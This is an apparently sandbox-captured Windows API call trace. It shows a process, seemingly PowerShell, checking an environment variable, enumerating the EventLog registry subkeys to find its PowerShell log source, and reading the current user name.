	[0783.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.088] CoTaskMemFree (pv=0x2b17f0) 
	[0783.796] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0783.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0783.796] CoTaskMemFree (pv=0x2b17f0) 
	[0783.802] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf38 | out: phkResult=0x14cf38*=0x2e0) returned 0x0
	[0783.806] RegQueryInfoKeyW (in: hKey=0x2e0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ceac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14cea8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ceac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14cea8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.806] CoTaskMemFree (pv=0x0) 
	[0783.807] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.807] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x0, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.807] CoTaskMemFree (pv=0x2564a0) 
	[0783.807] CoTaskMemFree (pv=0x0) 
	[0783.807] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.807] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x1, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.808] CoTaskMemFree (pv=0x2564a0) 
	[0783.808] CoTaskMemFree (pv=0x0) 
	[0783.808] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.808] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x2, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.808] CoTaskMemFree (pv=0x2564a0) 
	[0783.808] CoTaskMemFree (pv=0x0) 
	[0783.808] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.808] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x3, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.808] CoTaskMemFree (pv=0x2564a0) 
	[0783.808] CoTaskMemFree (pv=0x0) 
	[0783.808] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.808] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x4, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.808] CoTaskMemFree (pv=0x2564a0) 
	[0783.808] CoTaskMemFree (pv=0x0) 
	[0783.808] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.808] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x5, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.809] CoTaskMemFree (pv=0x2564a0) 
	[0783.809] CoTaskMemFree (pv=0x0) 
	[0783.809] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.809] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x6, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.809] CoTaskMemFree (pv=0x2564a0) 
	[0783.809] CoTaskMemFree (pv=0x0) 
	[0783.809] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.809] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x7, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.809] CoTaskMemFree (pv=0x2564a0) 
	[0783.809] CoTaskMemFree (pv=0x0) 
	[0783.809] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.809] RegEnumKeyExW (in: hKey=0x2e0, dwIndex=0x8, lpName=0x2564a0, lpcchName=0x14cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.810] CoTaskMemFree (pv=0x2564a0) 
	[0783.810] CoTaskMemFree (pv=0x0) 
	[0783.810] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x318) returned 0x0
	[0783.810] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x0) returned 0x2
	[0783.810] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x31c) returned 0x0
	[0783.810] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x0) returned 0x2
	[0783.810] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x320) returned 0x0
	[0783.810] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x0) returned 0x2
	[0783.810] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x324) returned 0x0
	[0783.810] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x0) returned 0x2
	[0783.811] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x328) returned 0x0
	[0783.811] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x0) returned 0x2
	[0783.811] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x32c) returned 0x0
	[0783.811] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x0) returned 0x2
	[0783.811] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x330) returned 0x0
	[0783.811] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x0) returned 0x2
	[0783.811] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x334) returned 0x0
	[0783.811] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x0) returned 0x2
	[0783.811] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x338) returned 0x0
	[0783.812] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf98 | out: phkResult=0x14cf98*=0x33c) returned 0x0
	[0783.812] RegCloseKey (hKey=0x33c) returned 0x0
	[0783.812] RegCloseKey (hKey=0x2e0) returned 0x0
	[0783.813] RegCloseKey (hKey=0x338) returned 0x0
	[0783.821] CoTaskMemAlloc (cb=0x804) returned 0x1b763c70
	[0783.821] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b763c70, nSize=0x14d1a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d1a8) returned 0x1
	[0783.824] CoTaskMemFree (pv=0x1b763c70) 
	[0783.825] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.825] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d1e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d1e8) returned 1
	[0783.826] CoTaskMemFree (pv=0x2564a0) 
	[0784.656] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cee8 | out: phkResult=0x14cee8*=0x340) returned 0x0
	[0784.656] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ce5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ce58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ce5c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ce58*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.656] CoTaskMemFree (pv=0x0) 
	[0784.656] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.656] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.656] CoTaskMemFree (pv=0x2564a0) 
	[0784.656] CoTaskMemFree (pv=0x0) 
	[0784.656] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.656] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.657] CoTaskMemFree (pv=0x2564a0) 
	[0784.657] CoTaskMemFree (pv=0x0) 
	[0784.657] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.657] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.657] CoTaskMemFree (pv=0x2564a0) 
	[0784.657] CoTaskMemFree (pv=0x0) 
	[0784.657] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.657] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.657] CoTaskMemFree (pv=0x2564a0) 
	[0784.657] CoTaskMemFree (pv=0x0) 
	[0784.657] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.657] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.657] CoTaskMemFree (pv=0x2564a0) 
	[0784.657] CoTaskMemFree (pv=0x0) 
	[0784.657] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.658] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.658] CoTaskMemFree (pv=0x2564a0) 
	[0784.658] CoTaskMemFree (pv=0x0) 
	[0784.658] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.658] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.658] CoTaskMemFree (pv=0x2564a0) 
	[0784.658] CoTaskMemFree (pv=0x0) 
	[0784.658] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.658] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.658] CoTaskMemFree (pv=0x2564a0) 
	[0784.658] CoTaskMemFree (pv=0x0) 
	[0784.658] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.658] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.658] CoTaskMemFree (pv=0x2564a0) 
	[0784.658] CoTaskMemFree (pv=0x0) 
	[0784.659] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x344) returned 0x0
	[0784.659] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.659] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x348) returned 0x0
	[0784.659] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.659] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x34c) returned 0x0
	[0784.659] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.660] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x350) returned 0x0
	[0784.660] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.660] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x354) returned 0x0
	[0784.660] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.660] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x358) returned 0x0
	[0784.660] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.660] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x35c) returned 0x0
	[0784.661] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.661] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x360) returned 0x0
	[0784.661] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.661] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x364) returned 0x0
	[0784.661] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x368) returned 0x0
	[0784.661] RegCloseKey (hKey=0x368) returned 0x0
	[0784.661] RegCloseKey (hKey=0x340) returned 0x0
	[0784.662] RegCloseKey (hKey=0x364) returned 0x0
	[0784.663] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cee8 | out: phkResult=0x14cee8*=0x364) returned 0x0
	[0784.663] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ce5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ce58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ce5c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ce58*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.663] CoTaskMemFree (pv=0x0) 
	[0784.663] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.663] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.663] CoTaskMemFree (pv=0x2564a0) 
	[0784.663] CoTaskMemFree (pv=0x0) 
	[0784.663] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.663] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.663] CoTaskMemFree (pv=0x2564a0) 
	[0784.663] CoTaskMemFree (pv=0x0) 
	[0784.663] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.663] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.664] CoTaskMemFree (pv=0x2564a0) 
	[0784.664] CoTaskMemFree (pv=0x0) 
	[0784.664] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.664] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.664] CoTaskMemFree (pv=0x2564a0) 
	[0784.664] CoTaskMemFree (pv=0x0) 
	[0784.664] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.664] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.664] CoTaskMemFree (pv=0x2564a0) 
	[0784.664] CoTaskMemFree (pv=0x0) 
	[0784.664] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.664] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.664] CoTaskMemFree (pv=0x2564a0) 
	[0784.664] CoTaskMemFree (pv=0x0) 
	[0784.664] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.665] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.665] CoTaskMemFree (pv=0x2564a0) 
	[0784.665] CoTaskMemFree (pv=0x0) 
	[0784.665] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.665] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.665] CoTaskMemFree (pv=0x2564a0) 
	[0784.665] CoTaskMemFree (pv=0x0) 
	[0784.665] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0784.665] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x2564a0, lpcchName=0x14cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0784.665] CoTaskMemFree (pv=0x2564a0) 
	[0784.665] CoTaskMemFree (pv=0x0) 
	[0784.665] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x340) returned 0x0
	[0784.666] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.666] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x368) returned 0x0
	[0784.666] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.666] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x36c) returned 0x0
	[0784.666] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.666] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x370) returned 0x0
	[0784.666] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.667] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x374) returned 0x0
	[0784.667] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.667] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x378) returned 0x0
	[0784.667] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.668] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x37c) returned 0x0
	[0784.668] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.668] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x380) returned 0x0
	[0784.668] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x0) returned 0x2
	[0784.669] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x384) returned 0x0
	[0784.669] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf48 | out: phkResult=0x14cf48*=0x388) returned 0x0
	[0784.669] RegCloseKey (hKey=0x388) returned 0x0
